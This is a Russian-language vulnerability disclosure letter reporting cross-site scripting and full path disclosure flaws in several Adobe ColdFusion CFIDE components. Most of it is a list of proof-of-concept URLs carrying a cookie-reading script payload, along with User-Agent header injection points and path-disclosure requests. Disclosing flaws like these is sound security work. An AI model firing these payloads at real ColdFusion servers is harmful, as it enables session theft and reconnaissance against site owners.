XSS и FPD уязвимости в Adobe ColdFusion

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною новых уязвимостях в Adobe ColdFusion. Это Cross-Site Scripting и Full path disclosure уязвимости.

XSS (WASC-08):

http://site/CFIDE/componentutils/componentdetail.cfm?component=%3Cbody%20onload=alert(document.cookie)%3E

http://site/CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=%3Cbody%20onload=alert(document.cookie)%3E

http://site/CFIDE/componentutils/cfcexplorer.cfc?method=%3Cbody%20onload=alert(document.cookie)%3E

http://site/CFIDE/componentutils/cfcexplorer.cfc (XSS через заголовок User-Agent)

http://site/CFIDE/probe.cfm (XSS через заголовок User-Agent)

http://site/CFIDE/Application.cfm (XSS через заголовок User-Agent)

http://site/CFIDE/componentutils/Application.cfm (XSS через заголовок User-Agent)

http://site/CFIDE/componentutils/_component_cfcToHTML.cfm (XSS через заголовок User-Agent)

http://site/CFIDE/componentutils/_component_cfcToMCDL.cfm (XSS через заголовок User-Agent)

Full path disclosure (WASC-13):

http://site/CFIDE/probe.cfm

http://site/CFIDE/componentutils/componentdetail.cfm?component=CFIDE.adminapi.base

http://site/CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=WEB-INF.cftags.component

http://site/CFIDE/componentutils/cfcexplorer.cfc?method=1

http://site/CFIDE/componentutils/_component_cfcToHTML.cfm

http://site/CFIDE/componentutils/_component_cfcToMCDL.cfm

Через componentdetail.cfm и cfcexplorer.cfc можно получить FPD даже при отключенных дебаг сообщениях на сервере.

Уязвимы Adobe ColdFusion 7 и предыдущие версии к XSS, и Adobe ColdFusion 9 и предыдущие версии к FPD.

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/5243/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua